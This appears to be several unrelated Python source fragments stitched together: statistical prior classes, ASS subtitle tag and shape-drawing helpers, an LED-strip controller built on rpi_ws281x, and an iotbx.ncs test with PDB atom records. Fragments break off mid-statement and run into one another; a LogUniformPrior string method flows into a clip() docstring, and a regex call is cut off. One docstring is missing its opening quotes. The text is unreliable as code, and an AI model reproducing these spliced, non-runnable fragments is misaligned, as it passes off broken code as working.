"""The line of text describing this prior for the model_mapper.info file"""
return (
"GaussianPrior, mean = " + str(self.mean) + ", sigma = " + str(self.sigma)
)
def __repr__(self):
return (
"<GaussianPrior id={} mean={} sigma={} "
"lower_limit={} upper_limit={}>".format(
self.id, self.mean, self.sigma, self.lower_limit, self.upper_limit
)
)
@property
def dict(self) -> dict:
"""
A dictionary representation of this prior
"""
prior_dict = super().dict
return {**prior_dict, "mean": self.mean, "sigma": self.sigma}
class UniformPrior(Prior):
"""A prior with a uniform distribution between a lower and upper limit"""
def value_for(self, unit):
"""
Parameters
----------
unit: Float
A unit hypercube value between 0 and 1
Returns
-------
value: Float
A value for the attribute between the upper and lower limits
"""
return self.lower_limit + unit * (self.upper_limit - self.lower_limit)
def log_prior_from_value(self, value):
"""
Returns the log prior of a physical value, so the log likelihood of a model evaluation can be converted to a
posterior as log_prior + log_likelihood.
This is used by Emcee in the log likelihood function evaluation.
NOTE: For a UniformPrior this is always zero, provided the value is between the lower and upper limit. Since
this is checked when the instance is made (in the *instance_from_vector* function), we can simply return
zero in this function.
Parameters
----------
value : float
The physical value of this prior's corresponding parameter in a `NonLinearSearch` sample."""
return 0.0
@property
def mean(self):
return self.lower_limit + (self.upper_limit - self.lower_limit) / 2
@mean.setter
def mean(self, new_value):
difference = new_value - self.mean
self.lower_limit += difference
self.upper_limit += difference
def __str__(self):
"""The line of text describing this prior for the model_mapper.info file"""
return (
"UniformPrior, lower_limit = "
+ str(self.lower_limit)
+ ", upper_limit = "
+ str(self.upper_limit)
)
class LogUniformPrior(UniformPrior):
"""A prior with a log-uniform distribution between a lower and upper limit"""
def __init__(self, lower_limit=1e-6, upper_limit=1.0):
"""
An object used to map a unit value to an attribute value for a specific
class attribute.
Parameters
----------
lower_limit: Float
The lowest value this prior can return
upper_limit: Float
The highest value this prior can return
"""
super().__init__(lower_limit=lower_limit, upper_limit=upper_limit)
if (self.lower_limit <= 0.0):
raise exc.PriorException(
"The lower limit of a LogUniformPrior cannot be zero or negative."
)
def value_for(self, unit):
"""
Parameters
----------
unit: Float
A unit hypercube value between 0 and 1
Returns
-------
value: Float
A value for the attribute between the upper and lower limits
"""
return 10.0 ** (
np.log10(self.lower_limit)
+ unit * (np.log10(self.upper_limit) - np.log10(self.lower_limit))
)
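# Worked example of the log-scale mapping above: with lower_limit=1e-3 and
# upper_limit=1e1, value_for(0.5) = 10 ** (-3 + 0.5 * (1 - (-3))) = 1e-1,
# i.e. the geometric (not arithmetic) midpoint of the interval.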
def log_prior_from_value(self, value):
"""
Returns the log prior of a physical value, so the log likelihood of a model evaluation can be converted to a
posterior as log_prior + log_likelihood.
This is used by Emcee in the log likelihood function evaluation.
Parameters
----------
value : float
The physical value of this prior's corresponding parameter in a `NonLinearSearch` sample."""
return 1.0 / value
def __str__(self):
"""The line of text describing this prior for the model_mapper.info file"""
return (
"""
Clip the text; only the part enclosed by the clip region is visible.
clip(x1, y1, x2, y2)
clip(vector)
"""
tipo = ""
if reverse:
tipo = "i"
if y1 == None and x2 == None and y2 == None:
vector = x1 # vector clip
return '\\{:s}clip({:s})'.format(tipo, vector)
elif x2 == None and y2 == None:
scale, vector = x1, y1 # vector clip with scale
return '\\{:s}clip({:d},{:s})'.format(tipo, scale, vector)
else:
x1, y1 = int(math.ceil(x1)), int(math.ceil(y1))
x2, y2 = int(math.ceil(x2)), int(math.ceil(y2))
return '\\{:s}clip({:d},{:d},{:d},{:d})'.format(tipo, x1, y1, x2, y2)
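# Usage sketch (the parameter names are inferred from the body above, since the
# function signature is not shown in this excerpt):
#     clip(0, 0, 1280, 360) -> '\\clip(0,0,1280,360)'
#     clip("m 0 0 l 100 0 l 100 100 l 0 100", reverse=True)
#         -> '\\iclip(m 0 0 l 100 0 l 100 100 l 0 100)'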
def p(mode, code=None):
"""Draw the specified figure."""
if not code:
code, mode = mode, 1
return '{\\p%d}%s{\\p0}' % (mode, code)
def blur(strength=1, dx=None, dy=None):
"""
Apply a gaussian blur to the text,
specifying separate values for x and y if needed;
if the border is not zero, the blur is applied to the border.
@strength: intensity of the blur
@dx, @dy: distance in x, y
"""
return '\\blur' + round_format_str(strength, 2)
def fax(factor):
"""Perspective distortion of the text along "x"."""
# Usually factor will be a small number,
# not larger than 2 as that creates a very strong distortion.
if factor > 2:
return '\\fax2'
else:
return '\\fax' + round_format_str(factor)
def fay(factor):
"""Perspective distortion of the text along "y"."""
if factor > 2:
return '\\fay2'
else:
return '\\fay' + round_format_str(factor)
def xbord(valor=1):
"""Border size along "x"."""
return '\\xbord' + round_format_str(valor, 2)
def ybord(valor=1):
"""Border size along "y"."""
return '\\ybord' + round_format_str(valor, 2)
def xshad(depth=1):
"""How far the text shadow is offset along the "x" axis."""
return '\\xshad' + round_format_str(depth, 2)
def yshad(depth=1):
"""How far the text shadow is offset along the "y" axis."""
return '\\yshad' + round_format_str(depth, 2)
def cycletags(inicio, duracion, intervalo, *tags):
"""
Create a rotating sequence of tags that cycle
according to the given time interval and the specified duration.
@inicio: start time
@duracion: duration of the effect
@intervalo: time interval that each group of tags lasts
@tags: groups of tags separated by commas (there can be more than 2)
Example:
cycletags(200, 1000, 100, be(1), be(2))
>>> '\\t(200,300,\\be1)\t(300,400,\\be2)..\\t(900,1000,\\be2)'
"""
i = 0
n = len(tags)
ttags = ''
start_time = inicio
end_time = start_time + intervalo
while end_time < duracion:
ttags += t(start_time, end_time, tags[i % n])
start_time = end_time
end_time += intervalo
i += 1
else:
ttags += t(start_time, duracion, tags[i % n])
return ttags
# Draw commands
def draw(tipo, x, y):
"""
Drawing command.
@tipo: type of drawing command (m, n, l, p, c)
@x: position on the x axis
@y: position on the y axis
Example:
draw("m", 10, 30)
>>> 'm 10 30 '
"""
return '{:s} {:s} {:s} '.format(
tipo, round_format_str(x, 2), round_format_str(y, 2))
def draw_shape(*points):
for i, (x, y) in enumerate(points):
if i == 0:
shape = draw("m", x, y)
else:
shape += draw("l", x, y)
return shape
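# Usage sketch (assuming round_format_str, not shown in this excerpt, renders whole
# numbers without a trailing decimal point):
#     draw_shape((0, 0), (100, 0), (100, 100), (0, 100))
#     -> 'm 0 0 l 100 0 l 100 100 l 0 100 '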
def draw_bezier(x1, y1, x2, y2, x3, y3):
return 'b %s %s %s %s %s %s ' % (
round_format_str(x1, 2), round_format_str(y1, 2),
round_format_str(x2, 2), round_format_str(y2, 2),
round_format_str(x3, 2), round_format_str(y3, 2))
def draw_spline(*posiciones):
bspline = 's '
for pos in posiciones:
bspline += '%s ' % round_format_str(pos, 2)
return bspline + ' c'
def shape_poligon(radio, lados):
"""
Drawing command (regular polygon).
@radio: radius of the polygon
@lados: number of sides of the polygon
Example:
poligon(15, 5)
>>>
"""
iangle = 360 / lados
# horizontal symmetry position
if lados % 2 != 0:
angle = 90 + (iangle / 2)
else:
angle = 90
pdraw = []
for i in range(lados + 1):
# ass draw commands
if i == 0:
dcommand = "m" # start drawing
else:
dcommand = "l" # join points with lines
# convert polar to rectangular
pdraw.append(draw(dcommand, *polar2rec(radio, angle)))
angle += iangle
return translate_shape("".join(pdraw), radio, radio)
def shape_star(radio1, radio2, spikes):
# the smallest radio is always the inner circle
if radio1 > radio2:
radio1, radio2 = radio2, radio1
iangle = 360 / spikes
# horizontal symmetry position
if spikes % 2 == 0:
angle1 = 90 + (iangle / 2)
else:
angle1 = 90
angle2 = angle1 + (iangle / 2)
pdraw = []
for i in range(spikes + 1):
# ass draw commands
if i == 0:
dcommand = "m" # start drawing
else:
dcommand = "l" # join points with lines
# convert polar to rectangular
pdraw.append(draw(dcommand, *polar2rec(radio1, angle1)))
pdraw.append(draw("l", *polar2rec(radio2, angle2)))
angle1 += iangle
angle2 += iangle
return translate_shape("".join(pdraw), radio2, radio2)
def shape_pentagon(r):
"""Drawing command (regular pentagon).
@r: radius of the pentagon
Example:
pentagon(15)
>>>
"""
return shape_poligon(r, 5)
def shape_circle(radio, substract=False):
def resize(m):
num = (float(m.group(0)) / 100) * radio * 2
return round_format_str(num, 2)
def swap_coords(m):
return m.group(2) + " " + m.group(1)
shape = ("m 50 0 b 22 0 0 22 0 50 b 0 78 22 100 50 100 b "
"78 100 100 78 100 50 b 100 22 78 0 50 0 ")
if substract:
shape = shape_filter(shape, swap_coords)
return re.sub("\d+", resize, shape)
def shape_ellipse(w, h):
def rstr(n):
return round_format_str(n, 2)
w2, h2 = w / 2, h / 2
shape = (
"m %d %s "
"b %d %s %d %d %s %d "
"%s %d %s %d %s %s "
"%s %s %s %s %s %s "
"%s %s %d %s %d %s")
return shape % (
0, rstr(h2), # move
0, rstr(h2), 0, 0, rstr(w2), 0, # curve 1
rstr(w2), 0, rstr(w), 0, rstr(w), rstr(h2), # curve 2
rstr(w), rstr(h2), rstr(w), rstr(h), rstr(w2), rstr(h), # curve 3
rstr(w2), rstr(h), 0, rstr(h), 0, rstr(h2)) # curve 4
def shape_pixel():
return shape_square(1)
def shape_square(width=1, height=None):
if not height:
height = width
pt = draw('m', 0, 0)
pt += draw('l', width, 0)
pt += draw('l', width, height)
pt += draw('l', 0, height)
return pt
def shape_triangle(size):
def rstr(n):
return round_format_str(n, 2)
h = math.sqrt(3) * (size / 2)
base = -h
shape = 'm %s %s l %s %s 0 %s %s %s' % (
rstr(size / 2), rstr(base),
rstr(size), rstr(base + h),
rstr(base + h), rstr(size / 2), rstr(base))
return translate_shape(shape, 0, h)
def shape_ring(radio, outline_width):
radio2 = radio - outline_width
circle2 = shape_circle(radio2, substract=True)
circle2 = translate_shape(circle2, -radio2, -radio2)
circle2 = translate_shape(circle2, radio, radio)
return shape_circle(radio) + circle2
def shape_heart(size=30):
def resize(m):
num = (float(m.group(0)) / 30) * size
return round_format_str(num, 2)
path = ("m 15 30 b 27 22 30 18 30 14 30 8 22 "
"0 15 10 8 0 0 8 0 14 0 18 3 22 15 30")
return re.sub("\d+", resize, path)
def shape_filter(shape, function):
return re.sub(r"(-?\d+\.\d+|-?\d+)\s(-?\d+\.\d+|-?\d+)", function, shape)
def shape_max(shape):
def abs_float(n):
return abs(float(n))
pattern = r"(-?\d+\.\d+|-?\d+)\s(-?\d+\.\d+|-?\d+)"
coords = [list(map(abs_float, n)) for n in re.findall(pattern, shape)]
maxx = max(coords, key=operator.itemgetter(0))[0]
maxy = max(coords, key=operator.itemgetter(1))[1]
return maxx, maxy
def shape_min(shape):
def abs_float(n):
return abs(float(n))
pattern = r"(-?\d+\.\d+|-?\d+)\s(-?\d+\.\d+|-?\d+)"
coords = [list(map(abs_float, n)) for n in re.findall(pattern, shape)]
maxx = min(coords, key=operator.itemgetter(0))[0]
maxy = min(coords, key=operator.itemgetter(1))[1]
return maxx, maxy
def rotate_shape(shape, angle):
theta = math.radians(angle)
# translate to origin
# rotate
# translate original position
def rotate(m):
x, y = float(m.group(1)), float(m.group(2))
x1 = x * math.cos(theta) - y * math.sin(theta)
y1 = x * math.sin(theta) + y * math.cos(theta)
return round_format_str(x1, 2) + " " + round_format_str(y1, 2)
maxx, maxy = shape_max(shape)
shape_origin = translate_shape(shape, -maxx / 2, -maxy / 2)
shape_rotated = shape_filter(shape_origin, rotate)
maxx, maxy = shape_max(shape_rotated)
shape_opos = translate_shape(shape_rotated, maxx, maxy)
return shape_opos
def translate_shape(shape, x, y):
def move(m):
px, py = float(m.group(1)) + x, float(m.group(2)) + y
return round_format_str(px, 2) + " " + round_format_str(py, 2)
return shape_filter(shape, move)
# def center_shape(shape):
# maxx, maxy = shape_max(shape)
# return translate_shape(shape, -maxx / 2, -maxy / 2)
def scale_shape(shape, x, y=None):
if not y:
y = x
def scale(m):
px, py = float(m.group(1)) * x, float(m.group(2)) * y
return round_format_str(px, 2) + " " + round_format_str(py, 2)
return shape_filter(shape, scale)
def flip_shape(shape):
def flip(m):
return str(0 - int(m.group(1))) + " " + m.group(2)
return shape_filter(shape, flip)
def shape_to_bezier(steps, shape):
pattern = r"(-?\d+\.\d+|-?\d+)\s(-?\d+\.\d+|-?\d+)"
mx, my = map(float, re.search("m\s"
"""Class defines methods for interacting with Light Strings, Patterns, and Functions."""
import time
import random
import logging
from typing import (
Callable,
Dict,
List,
Optional,
Union,
Any,
)
from nptyping import NDArray
import numpy as np
from LightBerries import LightPatterns
from LightBerries.RpiWS281xPatch import rpi_ws281x
from LightBerries.LightBerryExceptions import LightControlException
from LightBerries.LightPixels import Pixel, PixelColors
from LightBerries.LightStrings import LightString
from LightBerries.LightFunctions import LightFunction, LEDFadeType, RaindropStates, SpriteState, ThingMoves
from LightBerries.LightPatterns import (
SolidColorArray,
ConvertPixelArrayToNumpyArray,
RepeatingColorSequenceArray,
ColorTransitionArray,
RainbowArray,
RepeatingRainbowArray,
ReflectArray,
DefaultColorSequence,
DEFAULT_BACKGROUND_COLOR,
)
LOGGER = logging.getLogger("LightBerries")
DEFAULT_REFRESH_DELAY = 50
class LightController:
"""This library wraps the rpi_ws281x library and provides some lighting functions.
See https://github.com/rpi-ws281x/rpi-ws281x-python for questions about rpi_ws281x library.
Quick Start:
1: Create a LightController object specifying ledCount:int, pwmGPIOpin:int,
channelDMA:int, frequencyPWM:int
lights = LightController(10, 18, 10, 800000)
2: Choose a color pattern
lights.useColorRainbow()
3: Choose a function
lights.useFunctionCylon()
4: Choose a duration to run
lights.secondsPerMode = 60
5: Run
lights.run()
"""
def __init__(
self,
ledCount: int = 100,
pwmGPIOpin: int = 18,
channelDMA: int = 10,
frequencyPWM: int = 800000,
invertSignalPWM: bool = False,
ledBrightnessFloat: float = 0.75,
channelPWM: int = 0,
stripTypeLED: Any = None,
gamma: Any = None,
debug: bool = False,
verbose: bool = False,
refreshCallback: Callable = None,
simulate: bool = False,
) -> None:
"""Create a LightController object for running patterns across a rpi_ws281x LED string.
Args:
ledCount: the number of Pixels in your string of LEDs
pwmGPIOpin: the GPIO pin number your lights are hooked up to
(18 is a good choice since it does PWM)
channelDMA: the DMA channel to use (5 is a good option)
frequencyPWM: try 800,000
invertSignalPWM: set true to invert the PWM signal
ledBrightnessFloat: set to a value between 0.0 (OFF) and 1.0 (fully ON).
Lower brightness values tend to introduce flicker.
channelPWM: defaults to 0, see https://github.com/rpi-ws281x/rpi-ws281x-python
stripTypeLED: see https://github.com/rpi-ws281x/rpi-ws281x-python
gamma: see https://github.com/rpi-ws281x/rpi-ws281x-python
debug: set true for some debugging messages
verbose: set true for even more information
refreshCallback: callback method is called whenever new LED values are sent to LED string
simulate: only call refreshCallback, dont use GPIO
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
# configure logging
if debug is True or verbose is True:
LOGGER.setLevel(logging.DEBUG)
if verbose is True:
LOGGER.setLevel(5)
self.simulate = simulate
# create ws281x pixel strip
pixelStrip = None
if self.simulate is False:
pixelStrip = rpi_ws281x.PixelStrip(
pin=pwmGPIOpin,
dma=channelDMA,
num=ledCount,
freq_hz=frequencyPWM,
channel=channelPWM,
invert=invertSignalPWM,
gamma=gamma,
strip_type=stripTypeLED,
brightness=int(255 * ledBrightnessFloat),
)
# wrap pixel strip in my own interface object
self.ws28xxLightString: Optional[LightString] = LightString(
pixelStrip=pixelStrip, ledCount=ledCount, simulate=self.simulate
)
# initialize instance variables
self.privateLEDCount: int = len(self.ws28xxLightString)
self.virtualLEDArray: NDArray[(3, Any), np.int32] = SolidColorArray(
arrayLength=self.privateLEDCount,
color=PixelColors.OFF,
)
self.virtualLEDIndexArray: NDArray[(Any,), np.int32] = np.array(
range(len(self.ws28xxLightString))
)
self.privateOverlayDict: Dict[int, NDArray[(3,), np.int32]] = {}
self.privateVirtualLEDCount: int = len(self.virtualLEDArray)
self.privateVirtualLEDIndexCount: int = len(self.virtualLEDIndexArray)
self.privateLastModeChange: float = time.time() - 1000
self.privateNextModeChange: float = time.time()
self.privateRefreshDelay: float = 0.001
self.privateSecondsPerMode: float = 120.0
self.privateBackgroundColor: NDArray[(3,), np.int32] = PixelColors.OFF.array
self.privateColorSequence: NDArray[(3, Any), np.int32] = ConvertPixelArrayToNumpyArray([])
self.privateColorSequenceCount: int = 0
self.privateColorSequenceIndex: int = 0
self.privateLoopForever: bool = False
self.privateLightFunctions: List[LightFunction] = []
# give LightFunction class a pointer to this class
LightFunction.Controller = self
self.refreshCallback: Callable = refreshCallback
# initialize stuff
self.reset()
except SystemExit:
raise
except KeyboardInterrupt:
raise
except Exception as ex:
LOGGER.exception(
"%s.%s Exception: %s",
self.__class__.__name__,
"__init__",
ex,
)
raise LightControlException(str(ex)).with_traceback(ex.__traceback__)
def __del__(
self,
) -> None:
"""Disposes of the rpi_ws281x object (if it exists) to prevent memory leaks.
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
if hasattr(self, "_LEDArray") and self.ws28xxLightString is not None:
self.off()
self.copyVirtualLedsToWS281X()
self.refreshLEDs()
self.ws28xxLightString.__del__()
self.ws28xxLightString = None
except SystemExit:
raise
except KeyboardInterrupt:
raise
except Exception as ex:
LOGGER.exception(
"%s.%s Exception: %s",
self.__class__.__name__,
self.__del__.__name__,
ex,
)
raise LightControlException(str(ex)).with_traceback(ex.__traceback__)
@property
def virtualLEDCount(self) -> int:
"""The number of virtual LEDs. These include ones that won't display.
Returns:
the number of virtual LEDs
"""
return self.privateVirtualLEDCount
@property
def realLEDCount(self) -> int:
"""The number of LEDs in the LED string.
Returns:
the number of actual LEDs in the string (as configured)
"""
return self.privateLEDCount
@property
def refreshDelay(
self,
) -> float:
"""The delay between starting LED refreshes.
Returns:
the delay between refreshes
"""
return self.privateRefreshDelay
@refreshDelay.setter
def refreshDelay(
self,
delay: float,
) -> None:
"""Set the refresh delay.
Args:
delay: the delay in seconds
"""
self.privateRefreshDelay = float(delay)
@property
def backgroundColor(
self,
) -> NDArray[(3,), np.int32]:
"""The defined background, or "Off" color for the LED string.
Returns:
the rgb value
"""
return self.privateBackgroundColor
@backgroundColor.setter
def backgroundColor(
self,
color: NDArray[(3,), np.int32],
) -> None:
"""Set the background color.
Args:
color: an RGB value
"""
self.privateBackgroundColor = Pixel(color).array
@property
def secondsPerMode(
self,
) -> float:
"""The number of seconds to run the configuration.
Returns:
the seconds to run the current configuration
"""
return self.privateSecondsPerMode
@secondsPerMode.setter
def secondsPerMode(
self,
seconds: float,
) -> None:
"""Set the seconds per mode.
Args:
seconds: the number of seconds
"""
self.privateSecondsPerMode = float(seconds)
@property
def colorSequence(
self,
) -> NDArray[(3, Any), np.int32]:
"""The sequence of RGB values to use for generating patterns when using the functions.
Returns:
the sequence of RGB values
"""
return self.privateColorSequence
@colorSequence.setter
def colorSequence(
self,
colorSequence: NDArray[(3, Any), np.int32],
) -> None:
"""Set the color sequence.
Args:
colorSequence: the sequence of RGB values
"""
self.privateColorSequence = np.copy(ConvertPixelArrayToNumpyArray(colorSequence))
self.colorSequenceCount = len(self.privateColorSequence)
self.colorSequenceIndex = 0
@property
def colorSequenceCount(
self,
) -> int:
"""The number of colors in the defined sequence.
Returns:
the number of LEDs in the sequence
"""
return self.privateColorSequenceCount
@colorSequenceCount.setter
def colorSequenceCount(
self,
colorSequenceCount: int,
) -> None:
"""Set the Color sequence count.
Args:
colorSequenceCount: the number of colors in the sequence
"""
self.privateColorSequenceCount = colorSequenceCount
@property
def colorSequenceIndex(
self,
) -> int:
"""The index we are on in the current color sequence.
Returns:
the current index into the color sequence
"""
return self.privateColorSequenceIndex
@colorSequenceIndex.setter
def colorSequenceIndex(
self,
colorSequenceIndex: int,
) -> None:
"""Set the color sequence index.
Args:
colorSequenceIndex: the new index
"""
self.privateColorSequenceIndex = colorSequenceIndex
@property
def colorSequenceNext(
self,
) -> NDArray[(3,), np.int32]:
"""Get the next color in the sequence.
Returns:
the next RGB value
"""
temp = self.colorSequence[self.colorSequenceIndex]
self.colorSequenceIndex += 1
if self.colorSequenceIndex >= self.colorSequenceCount:
self.colorSequenceIndex = 0
if isinstance(temp, Pixel):
return temp.array
else:
return temp
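# Usage sketch (illustrative only): `ctrl` is a hypothetical, already-initialized
# controller, and RED/GREEN/BLUE are assumed members of the PixelColors helper.
# Assigning a sequence resets the index; reading `colorSequenceNext` repeatedly
# cycles through the colors and wraps back to the start.
#
#   ctrl.colorSequence = [PixelColors.RED, PixelColors.GREEN, PixelColors.BLUE]
#   first = ctrl.colorSequenceNext    # RED, index moves to 1
#   second = ctrl.colorSequenceNext   # GREEN, index moves to 2
#   third = ctrl.colorSequenceNext    # BLUE, index wraps back to 0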
@property
def functionList(self) -> List[LightFunction]:
"""The list of function objects that will be used to modify the light pattern.
Returns:
the list of functions
"""
return self.privateLightFunctions
@property
def overlayDictionary(self) -> Dict[int, Any]:
The list of indices and associated colors to temporarily assign to LEDs.
Returns:
the dictionary of LEDs and values
"""
return self.privateOverlayDict
def getColorMethodsList(self) -> List[str]:
"""Get the list of methods in this class (by name) that set the color sequence.
Returns:
a list of method name strings
"""
attrs = list(dir(self))
colors = [c for c in attrs if c[:8] == "useColor"]
colors.sort()
return colors
def getFunctionMethodsList(self) -> List[str]:
"""Get the list of methods in this class (by name) that set the color functions.
Returns:
a list of method name strings
"""
attrs = list(dir(self))
functions = [f for f in attrs if f[:11] == "useFunction"]
functions.sort()
return functions
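# Usage sketch (illustrative only): the returned names can be resolved with
# getattr and then invoked on the controller object, e.g.
#
#   for name in ctrl.getColorMethodsList():
#       method = getattr(ctrl, name)   # bound "useColor..." setter
#       # method(...) can then be called with whatever arguments it expects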
def reset(
self,
) -> None:
"""Reset class variables to default state.
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
LOGGER.debug("%s.%s:", self.__class__.__name__, self.reset.__name__)
self.privateLightFunctions = []
if self.virtualLEDCount > self.realLEDCount:
self.setVirtualLEDArray(self.virtualLEDArray[: self.realLEDCount])
elif self.virtualLEDCount < self.realLEDCount:
array = LightPatterns.SolidColorArray(arrayLength=self.realLEDCount, color=PixelColors.OFF)
array[: self.virtualLEDCount] = self.virtualLEDArray
self.setVirtualLEDArray(array)
except SystemExit:
raise
except KeyboardInterrupt:
raise
except Exception as ex:
LOGGER.exception(
"%s.%s Exception: %s",
self.__class__.__name__,
self.reset.__name__,
ex,
)
raise LightControlException(str(ex)).with_traceback(ex.__traceback__)
def setVirtualLEDArray(
self,
ledArray: Union[List[Pixel], NDArray[(3, Any), np.int32]],
) -> None:
"""Assign a sequence of pixel data to the LED.
Args:
ledArray: array of RGB values
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
# make sure the passed LED array is the correct type
if isinstance(ledArray, list):
_ledArray = ConvertPixelArrayToNumpyArray(ledArray)
elif isinstance(ledArray, np.ndarray):
_ledArray = ledArray
else:
_ledArray = SolidColorArray(arrayLength=self.realLEDCount, color=self.backgroundColor)
# check assignment
from __future__ import absolute_import, division, print_function
import iotbx.ncs
import iotbx.ncs as ncs
from iotbx import pdb
pdb_str_1="""\
ATOM 1 N GLU A 3 189.385 151.249 151.584 1.00100.71 N
ATOM 2 CA GLU A 3 190.604 152.017 151.807 1.00100.71 C
ATOM 3 C GLU A 3 191.582 151.843 150.650 1.00100.71 C
ATOM 4 O GLU A 3 191.527 150.846 149.929 1.00100.71 O
ATOM 5 CB GLU A 3 191.266 151.602 153.123 1.00 81.32 C
ATOM 6 N LYS A 4 192.471 152.820 150.489 1.00113.71 N
ATOM 7 CA LYS A 4 193.464 152.823 149.414 1.00113.71 C
ATOM 8 C LYS A 4 192.807 152.666 148.045 1.00113.71 C
ATOM 9 O LYS A 4 191.719 153.194 147.810 1.00113.71 O
ATOM 10 CB LYS A 4 194.500 151.716 149.633 1.00 74.77 C
ATOM 11 N ARG A 5 193.479 151.939 147.155 1.00126.03 N
ATOM 12 CA ARG A 5 192.989 151.690 145.800 1.00126.03 C
ATOM 13 C ARG A 5 192.651 152.988 145.072 1.00126.03 C
ATOM 14 O ARG A 5 191.677 153.056 144.321 1.00126.03 O
ATOM 15 CB ARG A 5 191.763 150.772 145.832 1.00 91.24 C
ATOM 16 N LEU A 6 193.465 154.014 145.302 1.00134.86 N
ATOM 17 CA LEU A 6 193.232 155.328 144.718 1.00126.46 C
ATOM 18 C LEU A 6 193.464 155.328 143.211 1.00118.31 C
ATOM 19 O LEU A 6 194.543 154.966 142.738 1.00116.86 O
ATOM 20 CB LEU A 6 194.129 156.372 145.384 1.00128.29 C
ATOM 21 N SER A 7 192.446 155.734 142.460 1.00127.84 N
ATOM 22 CA SER A 7 192.556 155.843 141.011 1.00123.16 C
ATOM 23 C SER A 7 193.118 157.206 140.626 1.00118.42 C
ATOM 24 O SER A 7 192.423 158.219 140.706 1.00104.49 O
ATOM 25 CB SER A 7 191.195 155.625 140.347 1.00121.63 C
ATOM 26 OG SER A 7 190.259 156.601 140.769 1.00106.82 O
ATOM 27 N ALA A 8 194.380 157.227 140.210 1.00118.32 N
ATOM 28 CA ALA A 8 195.053 158.483 139.901 1.00111.32 C
ATOM 29 C ALA A 8 195.632 158.502 138.491 1.00106.60 C
ATOM 30 O ALA A 8 195.140 159.230 137.629 1.00102.40 O
ATOM 31 CB ALA A 8 196.149 158.752 140.922 1.00102.52 C
ATOM 32 N LYS A 9 196.672 157.693 138.277 1.00107.25 N
ATOM 33 CA LYS A 9 197.479 157.673 137.046 1.00101.87 C
ATOM 34 C LYS A 9 197.684 159.066 136.442 1.00 99.64 C
ATOM 35 O LYS A 9 197.682 159.240 135.222 1.00 96.65 O
ATOM 36 CB LYS A 9 196.865 156.721 136.003 1.00116.20 C
ATOM 37 CG LYS A 9 195.479 157.086 135.482 1.00116.20 C
ATOM 38 CD LYS A 9 195.039 156.146 134.370 1.00116.20 C
ATOM 39 CE LYS A 9 194.946 154.712 134.860 1.00116.20 C
ATOM 40 NZ LYS A 9 194.513 153.782 133.781 1.00116.20 N
ATOM 41 N LYS A 10 197.886 160.050 137.313 1.00105.36 N
ATOM 42 CA LYS A 10 198.013 161.443 136.902 1.00 98.00 C
ATOM 43 C LYS A 10 199.366 161.728 136.262 1.00100.41 C
ATOM 44 O LYS A 10 200.353 161.046 136.539 1.00103.97 O
ATOM 45 CB LYS A 10 197.802 162.367 138.102 1.00106.11 C
ATOM 46 CG LYS A 10 198.764 162.114 139.252 1.00113.17 C
ATOM 47 CD LYS A 10 198.481 163.034 140.428 1.00110.08 C
ATOM 48 CE LYS A 10 199.445 162.775 141.574 1.00119.94 C
ATOM 49 NZ LYS A 10 199.358 161.373 142.069 1.00128.24 N
TER
ATOM 50 N GLU B 3 159.932 134.609 151.533 1.00114.47 N
ATOM 51 CA GLU B 3 161.039 133.685 151.754 1.00114.47 C
ATOM 52 C GLU B 3 161.174 132.703 150.594 1.00114.47 C
ATOM 53 O GLU B 3 160.207 132.450 149.874 1.00114.47 O
ATOM 54 CB GLU B 3 160.850 132.926 153.068 1.00 84.70 C
ATOM 55 N LYS B 4 162.377 132.158 150.430 1.00120.40 N
ATOM 56 CA LYS B 4 162.683 131.217 149.354 1.00120.40 C
ATOM 57 C LYS B 4 162.331 131.796 147.986 1.00120.40 C
ATOM 58 O LYS B 4 162.498 132.994 147.754 1.00120.40 O
ATOM 59 CB LYS B 4 161.949 129.891 149.570 1.00 79.41 C
ATOM 60 N ARG B 5 161.843 130.935 147.095 1.00131.79 N
ATOM 61 CA ARG B 5 161.454 131.328 145.741 1.00131.79 C
ATOM 62 C ARG B 5 162.586 132.049 145.013 1.00131.79 C
ATOM 63 O ARG B 5 162.351 132.998 144.265 1.00131.79 O
ATOM 64 CB ARG B 5 160.204 132.212 145.776 1.00 94.80 C
ATOM 65 N LEU B 6 163.811 131.590 145.241 1.00136.38 N
ATOM 66 CA LEU B 6 164.990 132.218 144.659 1.00127.98 C
ATOM 67 C LEU B 6 165.062 131.999 143.151 1.00119.83 C
ATOM 68 O LEU B 6 165.053 130.863 142.677 1.00118.38 O
ATOM 69 CB LEU B 6 166.259 131.684 145.325 1.00129.41 C
ATOM 70 N SER B 7 165.131 133.095 142.403 1.00127.99 N
ATOM 71 CA SER B 7 165.270 133.027 140.954 1.00123.31 C
ATOM 72 C SER B 7 166.741 132.912 140.572 1.00118.57 C
ATOM 73 O SER B 7 167.493 133.882 140.667 1.00104.64 O
ATOM 74 CB SER B 7 164.644 134.257 140.292 1.00117.80 C
ATOM 75 OG SER B 7 165.285 135.447 140.717 1.00102.99 O
ATOM 76 N ALA B 8 167.147 131.722 140.141 1.00124.82 N
ATOM 77 CA ALA B 8 168.549 131.469 139.833 1.00117.82 C
ATOM 78 C ALA B 8 168.746 130.925 138.421 1.00113.10 C
ATOM 79 O ALA B 8 169.288 131.619 137.560 1.00108.90 O
ATOM 80 CB ALA B 8 169.143 130.509 140.852 1.00108.04 C
ATOM 81 N LYS B 9 168.295 129.687 138.206 1.00118.88 N
ATOM 82 CA LYS B 9 168.523 128.914 136.975 1.00113.50 C
ATOM 83 C LYS B 9 169.913 129.148 136.371 1.00111.27 C
ATOM 84 O LYS B 9 170.076 129.209 135.151 1.00108.28 O
ATOM 85 CB LYS B 9 167.429 129.207 135.932 1.00136.65 C
ATOM 86 CG LYS B 9 167.347 130.639 135.415 1.00136.65 C
ATOM 87 CD LYS B 9 166.317 130.771 134.304 1.00136.65 C
ATOM 88 CE LYS B 9 164.925 130.416 134.796 1.00136.65 C
ATOM 89 NZ LYS B 9 163.904 130.545 133.719 1.00136.65 N
ATOM 90 N LYS B 10 170.911 129.255 137.242 1.00117.26 N
ATOM 91 CA LYS B 10 172.276 129.563 136.831 1.00109.90 C
ATOM 92 C LYS B 10 172.964 128.366 136.185 1.00112.31 C
ATOM 93 O LYS B 10 172.620 127.216 136.458 1.00115.87 O
ATOM 94 CB LYS B 10 173.091 130.044 138.033 1.00114.70 C
